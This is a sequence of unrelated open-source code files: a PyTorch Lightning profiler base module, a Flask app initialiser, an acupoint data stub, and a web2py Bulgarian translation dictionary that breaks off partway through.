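#
#     from taskflow import engines
#
#     flow = migrate_user(context, user_id, tenant_id=tenant_id)
#     engines.run(flow, store=context.store)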
| Mirantis/pumphouse | pumphouse/tasks/user.py | Python | apache-2.0 | 4,857 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Profiler to check if there are any bottlenecks in your code."""
import logging
import os
from abc import ABC, abstractmethod
from contextlib import contextmanager
from pathlib import Path
from typing import Any, Callable, Dict, Generator, Iterable, Optional, TextIO, Union
from pytorch_lightning.utilities.cloud_io import get_filesystem
log = logging.getLogger(__name__)
class AbstractProfiler(ABC):
"""Specification of a profiler."""
@abstractmethod
def start(self, action_name: str) -> None:
"""Defines how to start recording an action."""
@abstractmethod
def stop(self, action_name: str) -> None:
"""Defines how to record the duration once an action is complete."""
@abstractmethod
def summary(self) -> str:
"""Create profiler summary in text format."""
@abstractmethod
def setup(self, **kwargs: Any) -> None:
"""Execute arbitrary pre-profiling set-up steps as defined by subclass."""
@abstractmethod
def teardown(self, **kwargs: Any) -> None:
"""Execute arbitrary post-profiling tear-down steps as defined by subclass."""
class BaseProfiler(AbstractProfiler):
"""
If you wish to write a custom profiler, you should inherit from this class.
"""
def __init__(
self,
dirpath: Optional[Union[str, Path]] = None,
filename: Optional[str] = None,
) -> None:
self.dirpath = dirpath
self.filename = filename
self._output_file: Optional[TextIO] = None
self._write_stream: Optional[Callable] = None
self._local_rank: Optional[int] = None
self._log_dir: Optional[str] = None
self._stage: Optional[str] = None
@contextmanager
def profile(self, action_name: str) -> Generator:
"""
Yields a context manager to encapsulate the scope of a profiled action.
Example::
with self.profile('load training data'):
# load training data code
The profiler will start once you've entered the context and will automatically
stop once you exit the code block.
"""
try:
self.start(action_name)
yield action_name
finally:
self.stop(action_name)
def profile_iterable(self, iterable: Iterable, action_name: str) -> Generator:
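        """Profiles each ``next()`` call on ``iterable`` under ``action_name``."""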
iterator = iter(iterable)
while True:
try:
self.start(action_name)
value = next(iterator)
self.stop(action_name)
yield value
except StopIteration:
self.stop(action_name)
break
def _rank_zero_info(self, *args, **kwargs) -> None:
if self._local_rank in (None, 0):
log.info(*args, **kwargs)
def _prepare_filename(
self, action_name: Optional[str] = None, extension: str = ".txt", split_token: str = "-"
) -> str:
args = []
if self._stage is not None:
args.append(self._stage)
if self.filename:
args.append(self.filename)
if self._local_rank is not None:
args.append(str(self._local_rank))
if action_name is not None:
args.append(action_name)
filename = split_token.join(args) + extension
return filename
def _prepare_streams(self) -> None:
if self._write_stream is not None:
return
if self.filename:
filepath = os.path.join(self.dirpath, self._prepare_filename())
fs = get_filesystem(filepath)
file = fs.open(filepath, "a")
self._output_file = file
self._write_stream = file.write
else:
self._write_stream = self._rank_zero_info
def describe(self) -> None:
"""Logs a profile report after the conclusion of run."""
# there are pickling issues with open file handles in Python 3.6
# so to avoid them, we open and close the files within this function
# by calling `_prepare_streams` and `teardown`
self._prepare_streams()
summary = self.summary()
if summary:
self._write_stream(summary)
if self._output_file is not None:
self._output_file.flush()
self.teardown(stage=self._stage)
def _stats_to_str(self, stats: Dict[str, str]) -> str:
stage = f"{self._stage.upper()} " if self._stage is not None else ""
output = [stage + "Profiler Report"]
for action, value in stats.items():
header = f"Profile stats for: {action}"
if self._local_rank is not None:
header += f" rank: {self._local_rank}"
output.append(header)
output.append(value)
return os.linesep.join(output)
def setup(
self, stage: Optional[str] = None, local_rank: Optional[int] = None, log_dir: Optional[str] = None
) -> None:
"""Execute arbitrary pre-profiling set-up steps."""
self._stage = stage
self._local_rank = local_rank
self._log_dir = log_dir
self.dirpath = self.dirpath or log_dir
def teardown(self, stage: Optional[str] = None) -> None:
"""
Execute arbitrary post-profiling tear-down steps.
Closes the currently open file and stream.
"""
self._write_stream = None
if self._output_file is not None:
self._output_file.close()
self._output_file = None # can't pickle TextIOWrapper
def __del__(self) -> None:
self.teardown(stage=self._stage)
def start(self, action_name: str) -> None:
raise NotImplementedError
def stop(self, action_name: str) -> None:
raise NotImplementedError
def summary(self) -> str:
raise NotImplementedError
@property
def local_rank(self) -> int:
return 0 if self._local_rank is None else self._local_rank
class PassThroughProfiler(BaseProfiler):
"""
This class should be used when you don't want the (small) overhead of profiling.
The Trainer uses this class by default.
"""
def start(self, action_name: str) -> None:
pass
def stop(self, action_name: str) -> None:
pass
def summary(self) -> str:
return ""
| williamFalcon/pytorch-lightning | pytorch_lightning/profiler/base.py | Python | apache-2.0 | 6,875 |
__author__ = 'mwn'
import os
import sys
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask, render_template
app = Flask(__name__)
app.config.from_object('config')
handler = RotatingFileHandler('yapki.log', maxBytes=10000, backupCount=1)
handler.setLevel(logging.DEBUG)
app.logger.addHandler(handler)
########################
# Configure Secret Key #
########################
def install_secret_key(app, filename='secret_key'):
"""Configure the SECRET_KEY from a file
in the instance directory.
If the file does not exist, print instructions
to create it from a shell with a random key,
then exit.
"""
filename = os.path.join(app.instance_path, filename)
try:
app.config['SECRET_KEY'] = open(filename, 'rb').read()
except IOError:
print('Error: No secret key. Create it with:')
full_path = os.path.dirname(filename)
if not os.path.isdir(full_path):
print('mkdir -p {filename}'.format(filename=full_path))
print('head -c 24 /dev/urandom > {filename}'.format(filename=filename))
sys.exit(1)
if not app.config['DEBUG']:
install_secret_key(app)
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.after_request
def after_request(response):
    response.headers.add('X-Test', 'This is only a test.')
response.headers.add('Access-Control-Allow-Origin', '*') # TODO: set to real origin
return response
from app.web.controller import webBp
app.register_blueprint(webBp)
from app.rest.controller import restBp
app.register_blueprint(restBp)
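# Typical local run (a sketch; the actual entry-point script may differ):
#
#     from app import app
#     app.run(debug=True)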
| yafraorg/yafra-archive | yafra-python/server/app/__init__.py | Python | apache-2.0 | 1,628 |
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
SPELL=u'láogōng'
CN=u'劳宫'
NAME=u'laogong21'
CHANNEL='pericardium'
CHANNEL_FULLNAME='PericardiumChannelofHand-Jueyin'
SEQ='PC8'
if __name__ == '__main__':
pass
| sinotradition/meridian | meridian/acupoints/laogong21.py | Python | apache-2.0 | 241 |
# -*- coding: utf-8 -*-
{
'!langcode!': 'bg',
'!langname!': 'Български',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'"User Exception" debug mode. ': '"User Exception" debug mode. ',
'%s': '%s',
'%s %%{row} deleted': '%s записите бяха изтрити',
'%s %%{row} updated': '%s записите бяха обновени',
'%s selected': '%s selected',
'%s students registered': '%s students registered',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access)': '(requires internet access)',
'(requires internet access, experimental)': '(requires internet access, experimental)',
'(something like "it-it")': '(something like "it-it")',
'(version %s)': '(version %s)',
'?': '?',
'@markmin\x01Searching: **%s** %%{file}': 'Searching: **%s** files',
'A new version of web2py is available': 'A new version of web2py is available',
'A new version of web2py is available: %s': 'A new version of web2py is available: %s',
'Abort': 'Abort',
'About': 'about',
'About application': 'About application',
'Accept Terms': 'Accept Terms',
'Add breakpoint': 'Add breakpoint',
'additional code for your application': 'additional code for your application',
'Additional code for your application': 'Additional code for your application',
'Admin design page': 'Admin design page',
'admin disabled because no admin password': 'admin disabled because no admin password',
'admin disabled because not supported on google app engine': 'admin disabled because not supported on google apps engine',
'admin disabled because too many invalid login attempts': 'admin disabled because too many invalid login attempts',
'admin disabled because unable to access password file': 'admin disabled because unable to access password file',
'Admin is disabled because insecure channel': 'Admin is disabled because insecure channel',
'Admin is disabled because unsecure channel': 'Admin is disabled because unsecure channel',
'Admin language': 'Admin language',
'Admin versioning page': 'Admin versioning page',
'administrative interface': 'administrative interface',
'Administrator Password:': 'Administrator Password:',
'and rename it (required):': 'and rename it (required):',
'and rename it:': 'and rename it:',
'App does not exist or you are not authorized': 'App does not exist or you are not authorized',
'appadmin': 'appadmin',
'appadmin is disabled because insecure channel': 'appadmin is disabled because insecure channel',
'Application': 'Application',
'application "%s" uninstalled': 'application "%s" uninstalled',
'Application cannot be generated in demo mode': 'Application cannot be generated in demo mode',
'application compiled': 'application compiled',
'Application exists already': 'Application exists already',
'application is compiled and cannot be designed': 'application is compiled and cannot be designed',
'Application name:': 'Application name:',
'Application updated via git pull': 'Application updated via git pull',
'are not used': 'are not used',
'are not used yet': 'are not used yet',
'Are you sure you want to delete file "%s"?': 'Are you sure you want to delete file "%s"?',
'Are you sure you want to delete plugin "%s"?': 'Are you sure you want to delete plugin "%s"?',
'Are you sure you want to delete this object?': 'Are you sure you want to delete this object?',
'Are you sure you want to uninstall application "%s"': 'Are you sure you want to uninstall application "%s"',
'Are you sure you want to uninstall application "%s"?': 'Are you sure you want to uninstall application "%s"?',
'Are you sure you want to upgrade web2py now?': 'Are you sure you want to upgrade web2py now?',
'Are you sure?': 'Are you sure?',
'arguments': 'arguments',
'at char %s': 'at char %s',
'at line %s': 'at line %s',
'ATTENTION:': 'ATTENTION:',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.',
'ATTENTION: you cannot edit the running application!': 'ATTENTION: you cannot edit the running application!',
'Autocomplete Python Code': 'Autocomplete Python Code',
'Available databases and tables': 'Available databases and tables',
'Available Databases and Tables': 'Available Databases and Tables',
'back': 'back',
'Back to the plugins list': 'Back to the plugins list',
'Back to wizard': 'Back to wizard',
'Basics': 'Basics',
'Begin': 'Begin',
'breakpoint': 'breakpoint',
'Breakpoints': 'Breakpoints',
'breakpoints': 'breakpoints',
'Bulk Register': 'Bulk Register',
'Bulk Student Registration': 'Bulk Student Registration',
'Cache': 'Cache',
'cache': 'cache',
'Cache Cleared': 'Cache Cleared',
'Cache Keys': 'Cache Keys',
'cache, errors and sessions cleaned': 'cache, errors and sessions cleaned',
'can be a git repo': 'can be a git repo',
'Cancel': 'Cancel',
'Cannot be empty': 'Cannot be empty',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'Cannot compile: there are errors in your app. Debug it, correct errors and try again.',
'Cannot compile: there are errors in your app:': 'Cannot compile: there are errors in your app:',
'cannot create file': 'cannot create file',
'cannot upload file "%(filename)s"': 'cannot upload file "%(filename)s"',
'Change Admin Password': 'Change Admin Password',
'Change admin password': 'change admin password',
'change editor settings': 'change editor settings',
'Changelog': 'Changelog',
'check all': 'check all',
'Check for upgrades': 'check for upgrades',
'Check to delete': 'Check to delete',
'Checking for upgrades...': 'Checking for upgrades...',
'Clean': 'clean',
'Clear': 'Clear',
'Clear CACHE?': 'Clear CACHE?',
'Clear DISK': 'Clear DISK',
'Clear RAM': 'Clear RAM',
'click here for online examples': 'щракни тук за онлайн примери',
'click here for the administrative interface': 'щракни тук за административния интерфейс',
'Click row to expand traceback': 'Click row to expand traceback',
'Click row to view a ticket': 'Click row to view a ticket',
'click to check for upgrades': 'click to check for upgrades',
'code': 'code',
'Code listing': 'Code listing',
'collapse/expand all': 'collapse/expand all',
'Command': 'Command',
'Comment:': 'Comment:',
'Commit': 'Commit',
'Commit form': 'Commit form',
'Committed files': 'Committed files',
'Compile': 'compile',
'Compile (all or nothing)': 'Compile (all or nothing)',
'Compile (skip failed views)': 'Compile (skip failed views)',
'compiled application removed': 'compiled application removed',
'Condition': 'Condition',
'continue': 'continue',
'Controllers': 'Controllers',
'controllers': 'controllers',
'Count': 'Count',
'Create': 'create',
'create file with filename:': 'create file with filename:',
'create new application:': 'create new application:',
'Create new simple application': 'Create new simple application',
'Create/Upload': 'Create/Upload',
'created by': 'created by',
'Created by:': 'Created by:',
'Created On': 'Created On',
'Created on:': 'Created on:',
'crontab': 'crontab',
'Current request': 'Current request',
'Current response': 'Current response',
'Current session': 'Current session',
'currently running': 'currently running',
'currently saved or': 'currently saved or',
'data uploaded': 'данните бяха качени',
'Database': 'Database',
'database': 'database',
'Database %s select': 'Database %s select',
'database %s select': 'database %s select',
'Database administration': 'Database administration',
'database administration': 'database administration',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'Date and Time': 'Date and Time',
'db': 'дб',
'Debug': 'Debug',
'defines tables': 'defines tables',
'Delete': 'Delete',
'delete': 'delete',
'delete all checked': 'delete all checked',
'delete plugin': 'delete plugin',
'Delete this file (you will be asked to confirm deletion)': 'Delete this file (you will be asked to confirm deletion)',
'Delete:': 'Delete:',
'deleted after first hit': 'deleted after first hit',
'Demo': 'Demo',
'Deploy': 'deploy',
'Deploy on Google App Engine': 'Deploy on Google App Engine',
'Deploy to OpenShift': 'Deploy to OpenShift',
'Deploy to pythonanywhere': 'Deploy to pythonanywhere',
'Deploy to PythonAnywhere': 'Deploy to PythonAnywhere',
'Deployment form': 'Deployment form',
'Deployment Interface': 'Deployment Interface',
'Description:': 'Description:',
'design': 'дизайн',
'DESIGN': 'DESIGN',
'Design for': 'Design for',
'Detailed traceback description': 'Detailed traceback description',
'details': 'details',
'direction: ltr': 'direction: ltr',
'directory not found': 'directory not found',
'Disable': 'Disable',
'Disabled': 'Disabled',
'disabled in demo mode': 'disabled in demo mode',
'disabled in GAE mode': 'disabled in GAE mode',
'disabled in multi user mode': 'disabled in multi user mode',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Cleared',
'Display line numbers': 'Display line numbers',
'DO NOT use the "Pack compiled" feature.': 'DO NOT use the "Pack compiled" feature.',
'docs': 'docs',
'Docs': 'Docs',
'done!': 'готово!',
'Downgrade': 'Downgrade',
'Download .w2p': 'Download .w2p',
'Download as .exe': 'Download as .exe',
'download layouts': 'download layouts',
'Download layouts from repository': 'Download layouts from repository',
'download plugins': 'download plugins',
'Download plugins from repository': 'Download plugins from repository',
'EDIT': 'EDIT',
'Edit': 'edit',
'edit all': 'edit all',
'Edit application': 'Edit application',
'edit controller': 'edit controller',
'edit controller:': 'edit controller:',
'Edit current record': 'Edit current record',
'edit views:': 'edit views:',
'Editing %s': 'Editing %s',
'Editing file': 'Editing file',
'Editing file "%s"': 'Editing file "%s"',
'Editing Language file': 'Editing Language file',
'Editing Plural Forms File': 'Editing Plural Forms File',
'Editor': 'Editor',
'Email Address': 'Email Address',
'Enable': 'Enable',
'Enable Close-Tag': 'Enable Close-Tag',
'Enable Code Folding': 'Enable Code Folding',
'Enterprise Web Framework': 'Enterprise Web Framework',
'Error': 'Error',
'Error logs for "%(app)s"': 'Error logs for "%(app)s"',
'Error snapshot': 'Error snapshot',
'Error ticket': 'Error ticket',
'Errors': 'errors',
'Exception %(extype)s: %(exvalue)s': 'Exception %(extype)s: %(exvalue)s',
'Exception %s': 'Exception %s',
'Exception instance attributes': 'Exception instance attributes',
'Exit Fullscreen': 'Exit Fullscreen',
'Expand Abbreviation (html files only)': 'Expand Abbreviation (html files only)',
'export as csv file': 'export as csv file',
'Exports:': 'Exports:',
'exposes': 'exposes',
'exposes:': 'exposes:',
'extends': 'extends',
'failed to compile file because:': 'failed to compile file because:',
'failed to reload module': 'failed to reload module',
'failed to reload module because:': 'failed to reload module because:',
'File': 'File',
'file "%(filename)s" created': 'file "%(filename)s" created',
'file "%(filename)s" deleted': 'file "%(filename)s" deleted',
'file "%(filename)s" uploaded': 'file "%(filename)s" uploaded',
'file "%(filename)s" was not deleted': 'file "%(filename)s" was not deleted',
'file "%s" of %s restored': 'file "%s" of %s restored',
'file changed on disk': 'file changed on disk',
'file does not exist': 'file does not exist',
'file not found': 'file not found',
'file saved on %(time)s': 'file saved on %(time)s',
'file saved on %s': 'file saved on %s',
'filename': 'filename',
'Filename': 'Filename',
'Files added': 'Files added',
'filter': 'filter',
'Find Next': 'Find Next',
'Find Previous': 'Find Previous',
'Form has errors': 'Form has errors',
'Frames': 'Frames',
'Functions with no doctests will result in [passed] tests.': 'Functions with no doctests will result in [passed] tests.',
'GAE Email': 'GAE Email',
'GAE Output': 'GAE Output',
'GAE Password': 'GAE Password',
'Generate': 'Generate',
'Get from URL:': 'Get from URL:',
'Git Pull': 'Git Pull',
'Git Push': 'Git Push',
'Globals##debug': 'Globals##debug',
'go!': 'go!',
'Google App Engine Deployment Interface': 'Google App Engine Deployment Interface',
'Google Application Id': 'Google Application Id',
'Goto': 'Goto',
'graph model': 'graph model',
'Graph Model': 'Graph Model',
'Hello World': 'Здравей, свят',
'Help': 'help',
'here': 'here',
'Hide/Show Translated strings': 'Hide/Show Translated strings',
'Highlight current line': 'Highlight current line',
'Hits': 'Hits',
'Home': 'Home',
'honored only if the expression evaluates to true': 'honored only if the expression evaluates to true',
'htmledit': 'htmledit',
'If start the downgrade, be patient, it may take a while to rollback': 'If start the downgrade, be patient, it may take a while to rollback',
'If start the upgrade, be patient, it may take a while to download': 'If start the upgrade, be patient, it may take a while to download',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\n\t\tA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\n\t\tA green title indicates that all tests (if defined) passed. In this case test results are not shown.',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.',
'if your application uses a database other than sqlite you will then have to configure its DAL in pythonanywhere.': 'if your application uses a database other than sqlite you will then have to configure its DAL in pythonanywhere.',
'import': 'import',
'Import/Export': 'Import/Export',
'In development, use the default Rocket webserver that is currently supported by this debugger.': 'In development, use the default Rocket webserver that is currently supported by this debugger.',
'includes': 'includes',
'Indent with tabs': 'Indent with tabs',
'insert new': 'insert new',
'insert new %s': 'insert new %s',
'inspect attributes': 'inspect attributes',
'Install': 'install',
'Installation of %(plugin)s for %(app)s': 'Installation of %(plugin)s for %(app)s',
'Installed applications': 'Installed applications',
'Interaction at %s line %s': 'Interaction at %s line %s',
'Interactive console': 'Interactive console',
'internal error': 'internal error',
'internal error: %s': 'internal error: %s',
'Internal State': 'Internal State',
'Invalid action': 'Invalid action',
'Invalid application name': 'Invalid application name',
'invalid circular reference': 'invalid circular reference',
'Invalid git repository specified.': 'Invalid git repository specified.',
'invalid password': 'invalid password',
'invalid password.': 'invalid password.',
'Invalid Query': 'Невалидна заявка',
'invalid request': 'невалидна заявка',
'Invalid request': 'Invalid request',
'invalid table names (auth_* tables already defined)': 'invalid table names (auth_* tables already defined)',
'invalid ticket': 'invalid ticket',
'Key': 'Key',
'Keyboard shortcuts': 'Keyboard shortcuts',
'kill process': 'kill process',
'language file "%(filename)s" created/updated': 'language file "%(filename)s" created/updated',
'Language files (static strings) updated': 'Language files (static strings) updated',
'languages': 'languages',
'Languages': 'Languages',
'languages updated': 'languages updated',
'Last Revision': 'Last Revision',
'Last saved on:': 'Last saved on:',
'License for': 'License for',
'License:': 'License:',
'Line Nr': 'Line Nr',
'Line number': 'Line number',
'lists by exception': 'lists by exception',
'lists by ticket': 'lists by ticket',
'Loading...': 'Loading...',
'loading...': 'loading...',
'Local Apps': 'Local Apps',
'locals': 'locals',
'Locals##debug': 'Locals##debug',
'Login': 'Login',
'login': 'login',
'Login successful': 'Login successful',
'Login to the Administrative Interface': 'Login to the Administrative Interface',
'Login/Register': 'Login/Register',
'Logout': 'logout',
'lost password': 'lost password',
'Main Menu': 'Main Menu',
'Manage': 'Manage',
'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Admin Users/Students': 'Manage Admin Users/Students',
'Manage Cache': 'Manage Cache',
'Manage Students': 'Manage Students',
'Memberships': 'Memberships',
'merge': 'merge',
'Models': 'Models',
'models': 'models',
'Modified On': 'Modified On',
'Modules': 'Modules',
'modules': 'modules',
'Multi User Mode': 'Multi User Mode',
'new application "%s" created': 'new application "%s" created',
'new application "%s" imported': 'new application "%s" imported',
'New Application Wizard': 'New Application Wizard',
'New application wizard': 'New application wizard',
'new plugin installed': 'new plugin installed',
'New plugin installed: %s': 'New plugin installed: %s',
'New Record': 'New Record',
'new record inserted': 'новият запис беше добавен',
'New simple application': 'New simple application',
'next': 'next',
'next %s rows': 'next %s rows',
'next 100 rows': 'next 100 rows',
'NO': 'NO',
'no changes': 'no changes',
'No databases in this application': 'No databases in this application',
'No Interaction yet': 'No Interaction yet',
'no match': 'no match',
'no package selected': 'no package selected',
'no permission to uninstall "%s"': 'no permission to uninstall "%s"',
'Node:': 'Node:',
'Not Authorized': 'Not Authorized',
'Not supported': 'Not supported',
'Note: If you receive an error with github status code of 128, ensure the system and account you are deploying from has a cooresponding ssh key configured in the openshift account.': 'Note: If you receive an error with github status code of 128, ensure the system and account you are deploying from has a cooresponding ssh key configured in the openshift account.',
"On production, you'll have to configure your webserver to use one process and multiple threads to use this debugger.": "On production, you'll have to configure your webserver to use one process and multiple threads to use this debugger.",
'Open new app in new window': 'Open new app in new window',
'OpenShift Deployment Interface': 'OpenShift Deployment Interface',
'OpenShift Output': 'OpenShift Output',
'or alternatively': 'or alternatively',
'Or Get from URL:': 'Or Get from URL:',
'or import from csv file': 'or import from csv file',
'or provide app url:': 'or provide app url:',
'or provide application url:': 'or provide application url:',
'Original/Translation': 'Original/Translation',
'Overview': 'Overview',
'Overwrite installed app': 'overwrite installed app',
'Pack all': 'pack all',
'Pack compiled': 'pack compiled',
'Pack custom': 'Pack custom',
'pack plugin': 'pack plugin',
'PAM authenticated user, cannot change password here': 'PAM authenticated user, cannot change password here',
'password changed': 'password changed',
'Past revisions': 'Past revisions',
'Path to appcfg.py': 'Path to appcfg.py',
'Path to local openshift repo root.': 'Path to local openshift repo root.',
'Peeking at file': 'Peeking at file',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Please': 'Please',
'Please wait, giving pythonanywhere a moment...': 'Please wait, giving pythonanywhere a moment...',
'plugin "%(plugin)s" deleted': 'plugin "%(plugin)s" deleted',
'Plugin "%s" in application': 'Plugin "%s" in application',
'plugin not specified': 'plugin not specified',
'Plugin page': 'Plugin page',
'plugins': 'plugins',
'Plugins': 'Plugins',
'Plural Form #%s': 'Plural Form #%s',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'Powered by',
'Preferences saved correctly': 'Preferences saved correctly',
'Preferences saved on session only': 'Preferences saved on session only',
'previous %s rows': 'previous %s rows',
'previous 100 rows': 'previous 100 rows',
'Private files': 'Private files',
'private files': 'private files',
'Project Progress': 'Project Progress',
'Pull': 'Pull',
'Pull failed, certain files could not be checked out. Check logs for details.': 'Pull failed, certain files could not be checked out. Check logs for details.',
'Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.': 'Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.',
'Push': 'Push',
'Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.': 'Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.',
'pygraphviz library not found': 'pygraphviz library not found',
'PythonAnywhere Apps': 'PythonAnywhere Apps',
'PythonAnywhere Password': 'PythonAnywhere Password',
'Query:': 'Query:',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'Rapid Search': 'Rapid Search',
'Record': 'Record',
'record': 'record',
'record does not exist': 'записът не съществува',
'record id': 'record id',
'Record id': 'Record id',
'refresh': 'refresh',
'register': 'register',
'Reload routes': 'Reload routes',
'Remove compiled': 'remove compiled',
'Removed Breakpoint on %s at line %s': 'Removed Breakpoint on %s at line %s',
'Replace': 'Replace',
'Replace All': 'Replace All',
'Repository (%s)': 'Repository (%s)',
'request': 'request',
'requires distutils, but not installed': 'requires distutils, but not installed',
'requires python-git, but not installed': 'requires python-git, but not installed',
'Resolve Conflict file': 'Resolve Conflict file',
'response': 'response',
'restart': 'restart',
'restore': 'restore',
'return': 'return',
'Revert': 'Revert',
'revert': 'revert',
'reverted to revision %s': 'reverted to revision %s',
'Revision %s': 'Revision %s',
'Revision:': 'Revision:',
'Role': 'Role',
'Roles': 'Roles',
'Rows in table': 'Rows in table',
'Rows in Table': 'Rows in Table',
'Rows selected': 'Rows selected',
'rules are not defined': 'rules are not defined',
'Run tests': 'Run tests',
'Run tests in this file': 'Run tests in this file',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Run tests in this file (to run all files, you may also use the button labelled 'test')",
'Running on %s': 'Running on %s',
'Save': 'Save',
'save': 'save',
'Save file:': 'Save file:',
'Save file: %s': 'Save file: %s',
'Save model as...': 'Save model as...',
'Save via Ajax': 'Save via Ajax',
'Saved file hash:': 'Saved file hash:',
'Screenshot %s': 'Screenshot %s',
'Search': 'Search',
'Select Files to Package': 'Select Files to Package',
'selected': 'selected',
'session': 'session',
'session expired': 'session expired',
'Session saved correctly': 'Session saved correctly',
'Session saved on session only': 'Session saved on session only',
'Set Breakpoint on %s at line %s: %s': 'Set Breakpoint on %s at line %s: %s',
'shell': 'shell',
'Showing %s to %s of %s %s found': 'Showing %s to %s of %s %s found',
'Singular Form': 'Singular Form',
'Site': 'site',
'Size of cache:': 'Size of cache:',
'skip to generate': 'skip to generate',
'some files could not be removed': 'some files could not be removed',
'Something went wrong please wait a few minutes before retrying': 'Something went wrong please wait a few minutes before retrying',
'Sorry, could not find mercurial installed': 'Sorry, could not find mercurial installed',
'source : db': 'source : db',
'source : filesystem': 'source : filesystem',
'Start a new app': 'Start a new app',
'Start searching': 'Start searching',
'Start wizard': 'start wizard',
'state': 'състояние',
'Static': 'Static',
'static': 'static',
'Static files': 'Static files',
'Statistics': 'Statistics',
'Step': 'Step',
'step': 'step',
'stop': 'stop',
'submit': 'submit',
'Submit': 'Submit',
'successful': 'successful',
'Sure you want to delete this object?': 'Сигурен ли си, че искаш да изтриеш този обект?',
'switch to : db': 'switch to : db',
'switch to : filesystem': 'switch to : filesystem',
'Tab width (# characters)': 'Tab width (# characters)',
'table': 'table',
'Table': 'Table',
'Temporary': 'Temporary',
'test': 'test',
'Testing application': 'Testing application',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
'The app exists, was created by wizard, continue to overwrite!': 'The app exists, was created by wizard, continue to overwrite!',
'The app exists, was NOT created by wizard, continue to overwrite!': 'The app exists, was NOT created by wizard, continue to overwrite!',
'the application logic, each URL path is mapped in one exposed function in the controller': 'the application logic, each URL path is mapped in one exposed function in the controller',
'The application logic, each URL path is mapped in one exposed function in the controller': 'The application logic, each URL path is mapped in one exposed function in the controller',
'the data representation, define database tables and sets': 'the data representation, define database tables and sets',
'The data representation, define database tables and sets': 'The data representation, define database tables and sets',
'The presentations layer, views are also known as templates': 'The presentations layer, views are also known as templates',
'the presentations layer, views are also known as templates': 'the presentations layer, views are also known as templates',
'Theme': 'Theme',
'There are no controllers': 'There are no controllers',
'There are no models': 'There are no models',
'There are no modules': 'There are no modules',
'There are no plugins': 'There are no plugins',
'There are no private files': 'There are no private files',
'There are no static files': 'There are no static files',
'There are no translators': 'There are no translators',
'There are no translators, only default language is supported': 'There are no translators, only default language is supported',
'There are no views': 'There are no views',
'These files are not served, they are only available from within your app': 'These files are not served, they are only available from within your app',
'These files are served without processing, your images go here': 'These files are served without processing, your images go here',
'these files are served without processing, your images go here': 'these files are served without processing, your images go here',
"This debugger may not work properly if you don't have a threaded webserver or you're using multiple daemon processes.": "This debugger may not work properly if you don't have a threaded webserver or you're using multiple daemon processes.",
'This is an experimental feature and it needs more testing. If you decide to downgrade you do it at your own risk': 'This is an experimental feature and it needs more testing. If you decide to downgrade you do it at your own risk',
'This is an experimental feature and it needs more testing. If you decide to upgrade you do it at your own risk': 'This is an experimental feature and it needs more testing. If you decide to upgrade you do it at your own risk',
'This is the %(filename)s template': 'This is the %(filename)s template',
"This page can commit your changes to an openshift app repo and push them to your cloud instance. This assumes that you've already created the application instance using the web2py skeleton and have that repo somewhere on a filesystem that this web2py instance can access. This functionality requires GitPython installed and on the python path of the runtime that web2py is operating in.": "This page can commit your changes to an openshift app repo and push them to your cloud instance. This assumes that you've already created the application instance using the web2py skeleton and have that repo somewhere on a filesystem that this web2py instance can access. This functionality requires GitPython installed and on the python path of the runtime that web2py is operating in.",
'This page can upload your application to the Google App Engine computing cloud. Mind that you must first create indexes locally and this is done by installing the Google appserver and running the app locally with it once, or there will be errors when selecting records. Attention: deployment may take long time, depending on the network speed. Attention: it will overwrite your app.yaml. DO NOT SUBMIT TWICE.': 'This page can upload your application to the Google App Engine computing cloud. Mind that you must first create indexes locally and this is done by installing the Google appserver and running the app locally with it once, or there will be errors when selecting records. Attention: deployment may take long time, depending on the network speed. Attention: it will overwrite your app.yaml. DO NOT SUBMIT TWICE.',
'this page to see if a breakpoint was hit and debug interaction is required.': 'this page to see if a breakpoint was hit and debug interaction is required.',
